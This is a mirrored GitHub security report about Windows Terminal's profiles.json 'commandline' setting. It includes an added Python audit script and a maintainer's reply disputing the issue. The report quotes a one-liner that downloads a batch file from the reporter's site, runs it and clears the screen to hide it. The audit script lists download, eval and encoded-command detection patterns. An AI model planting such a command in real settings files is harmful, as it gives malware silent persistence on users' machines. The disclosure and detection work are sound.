[Possible Security Issue] > profiles.json "commandline" option #3110

Closed
opened 2026-01-30 23:13:15 +00:00 by claunia · 1 comment

Originally created by @ProHackTech on GitHub (Aug 4, 2019).

Environment

Windows Edition: Windows 10 Education
Version: 1903
OS Build: 18362.10005
Windows Terminal version: 0.3.2142.0

Possible Bug: Description

In profiles.json, under profiles, powershell.exe is the default profile when the Terminal app is freshly installed. PowerShell is called by the Terminal app using the "commandline" setting with the parameter "powershell.exe".

We can add parameters after "powershell.exe" to automate tasks. This happens each time a new tab with PowerShell is opened. But we can go further and exploit this feature.

The GIF demonstration shows one line command to download an (assumed) infected executable from unknown domain, keep it in the public/downloads directory to evade low privilege errors, run the infected executable, clear the screen immediately and run powershell.exe again.

It's assumed that the executable will be malware that quickly starts and closes itself. The user will find it hard to detect that anything is happening because a fresh PowerShell instance is called after the downloaded executable is run. Also, there is no warning prompt while running the executable, as shown in the demonstration.

demo video: https://prohack.tech/MS_Terminal_Possible_Bug.mp4

Steps to reproduce

  • Create a sample batch script for demo purposes with anything inside. Here I've created a script to open multiple cmd windows

  • Upload the file to any shady website. Here I've used my own not-trusted website

  • Paste the following command after "powershell.exe" for the setting "commandline" under profiles in profiles.json

command:
wget -O 'C:\\Users\\Public\\Downloads\\VIR.bat' prohack.tech/VIR.bat ; [Diagnostics.Process]::Start('C:\\Users\\Public\\Downloads\\VIR.bat') ; clear ; powershell.exe

  • Run the terminal app.

Expected behavior

Expected behavior is to not allow arguments directly from the profiles.json setting, because other applications could potentially infect(?) the settings file to download untrusted files.

Actual behavior

Arguments are allowed to run from the profiles.json setting.

Note

Marked as a possible security issue because exploiting this may be tricky, since a larger file downloaded through wget can be seen being downloaded by the user. Also, first-hand running processes will show details in the PowerShell instance. But as shown in the demo, processes started from the downloaded executable do not show in PowerShell. Could possibly be exploited without the user knowing.

Finding profiles.json is also easy with this string: "%LOCALAPPDATA%\Packages\Microsoft.WindowsTerminal_8wekyb3d8bbwe\RoamingState".
If this is a real issue, name it 'profile commandline injection' :P

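The report boils down to one fact: whatever sits after the executable in a profile's "commandline" is handed to that executable as arguments every time a tab opens, so a tampered settings file is a persistence point worth checking. The following audit is an added example, not code from the report or from the Windows Terminal project: it parses a profiles.json, takes the first token of each "commandline" as the spawned executable, and flags profiles whose commandline is anything other than a bare shell launch. The sample settings text, the baseline set of expected commandlines, the indicator patterns and every function name are constructed for this example; the only value taken from the report is the RoamingState path, and the file name profiles.json inside it is assumed.

```python
import json
import os
import re
import shlex

# Constructed sample of a profiles.json, abbreviated to the "profiles" array,
# which is all this audit inspects. The third profile's "commandline" is the
# report's proof of concept appended to the default "powershell.exe"; the
# doubled backslashes are JSON escapes, exactly as they would be pasted.
SAMPLE_PROFILES_JSON = r'''
{
  "profiles": [
    {"name": "Windows PowerShell", "commandline": "powershell.exe"},
    {"name": "cmd", "commandline": "cmd.exe"},
    {"name": "Windows PowerShell",
     "commandline": "powershell.exe wget -O 'C:\\Users\\Public\\Downloads\\VIR.bat' prohack.tech/VIR.bat ; [Diagnostics.Process]::Start('C:\\Users\\Public\\Downloads\\VIR.bat') ; clear ; powershell.exe"}
  ]
}
'''

# Assumed baseline: the bare shell launches a fresh install ships with.
# Anything else is not necessarily malicious, but it is a deviation that a
# reviewer should look at by hand.
EXPECTED_COMMANDLINES = {"powershell.exe", "cmd.exe"}

# Heuristic indicators (constructed for this example) that the arguments after
# the executable do more than tweak the shell: statement chaining, download or
# eval primitives, process launches, encoded payloads, remote hosts.
SUSPICIOUS_PATTERNS = [
    (r";|&&|\|", "statement chaining"),
    (r"\b(wget|curl|iwr|Invoke-WebRequest|iex|Invoke-Expression|DownloadString|DownloadFile)\b",
     "download/eval primitive"),
    (r"\[Diagnostics\.Process\]::Start|Start-Process", "process launch"),
    (r"-(enc|encodedcommand)\b", "encoded command"),
    (r"https?://|\b[\w.-]+\.(tech|com|net|org|io)/", "remote URL"),
]


def default_profiles_path():
    """Path the report gives for the settings directory on a 0.3.x install;
    the file name profiles.json inside RoamingState is assumed."""
    return os.path.join(os.environ.get("LOCALAPPDATA", ""), "Packages",
                        "Microsoft.WindowsTerminal_8wekyb3d8bbwe",
                        "RoamingState", "profiles.json")


def split_commandline(cmd):
    """Tokenise a commandline the way Terminal hands it on: the first token is
    the executable it spawns, the rest are that executable's arguments.
    Non-POSIX mode keeps Windows backslashes and quoted paths intact."""
    try:
        return shlex.split(cmd, posix=False)
    except ValueError:  # unbalanced quotes: fall back to a whitespace split
        return cmd.split()


def audit_profiles(profiles_json, expected=EXPECTED_COMMANDLINES):
    """Return one finding per profile whose "commandline" deviates from a bare
    shell launch, as (profile name, commandline, list of reasons)."""
    profiles = json.loads(profiles_json).get("profiles", [])
    if isinstance(profiles, dict):  # later settings files nest the array under "list"
        profiles = profiles.get("list", [])
    findings = []
    for profile in profiles:
        cmd = profile.get("commandline", "")
        if not cmd:
            continue
        tokens = split_commandline(cmd)
        exe = tokens[0].strip('"') if tokens else ""
        exe_name = exe.replace("\\", "/").rsplit("/", 1)[-1].lower()
        reasons = []
        if exe_name not in expected:
            reasons.append("unexpected executable %r" % exe)
        if len(tokens) > 1:
            reasons.append("%d argument token(s) after %s" % (len(tokens) - 1, exe))
        for pattern, label in SUSPICIOUS_PATTERNS:
            if re.search(pattern, cmd, re.IGNORECASE):
                reasons.append(label)
        if reasons:
            findings.append((profile.get("name", "<unnamed>"), cmd, reasons))
    return findings


def audit_file(path=None):
    """Audit a real settings file; defaults to the path named in the report."""
    with open(path or default_profiles_path(), encoding="utf-8") as fh:
        return audit_profiles(fh.read())


if __name__ == "__main__":
    for name, cmd, reasons in audit_profiles(SAMPLE_PROFILES_JSON):
        print("profile %r: %s" % (name, "; ".join(reasons)))
        print("  commandline: %s" % cmd)
```

Run against the sample, only the tampered profile is reported, with the chaining, the wget download, the Process.Start call and the remote host each called out separately; the two stock profiles produce nothing. A legitimate customisation such as a different shell or a flag after powershell.exe is also reported, which is deliberate: the check is a hygiene baseline for a file that, as the maintainer's reply points out, any code running as the user can already rewrite, so it tells you what changed rather than deciding for you whether the change is hostile.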
claunia added the Needs-Triage, Needs-Tag-Fix labels 2026-01-30 23:13:15 +00:00

@DHowett-MSFT commented on GitHub (Aug 4, 2019):

Hey, I appreciate you taking the time to write up this report.

In general, we are operating under the principle if an application has the privilege to write files into a directory owned by a user, it also already has privilege enough to perform any other operation as that user.

With the access a piece of malicious code would need to write malicious_part2.exe into the user’s Terminal profile, it would also be able to just run malicious_part2 itself. As Raymond Chen would say, “you’re already on the other side of the air-tight hatch.”

Reference: starred/terminal#3110